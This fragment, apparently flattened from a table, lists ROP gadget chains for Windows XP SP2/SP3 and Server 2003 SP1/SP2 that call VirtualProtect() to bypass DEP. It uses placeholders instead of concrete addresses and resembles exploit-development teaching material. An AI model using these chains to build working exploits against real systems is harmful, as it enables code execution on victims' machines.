WINDOWS XP SP2 WINDOWS XP SP3 POP EAX # RETN 0xFFFFFBFF -> ebx NEG EAX # POP EBP # RETN JUNK POP EBX # RETN Writable location XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN POP EDX # RETN 0xFFFFFFC0-> edx XCHG EAX, EDX # RETN NEG EAX # POP EBX # RETN JUNK XCHG EAX, EDX # RETN POP EBP # RETN skip 4 bytes POP ECX # RETN Writable location POP EDI # RETN RETN (ROP NOP) POP ESI # RETN JMP [EAX] POP EAX # RETN ptr to VirtualProtect() PUSHAD # RETN ptr to 'push esp # ret WINDOWS SERVER 2003 SP1 WINDOWS SERVER 2003 SP2 POP EAX # RETN VirtualProtect() MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN JUNK XCHG EAX,ESI # RETN POP EBP # RETN ptr to 'push esp # ret' POP EAX # RETN EAX SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) POP EBX, RET .data XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN POP ECX # RETN W pointer (lpOldProtect) (-> ecx) POP EDI # RETN ROP NOP (-> edi) POP EAX # RETN EAX SUB EAX, 03c0940f XCHG EAX,EDX # RETN POP EAX # RETN NOP PUSHAD # ADD AL,0EF # RETN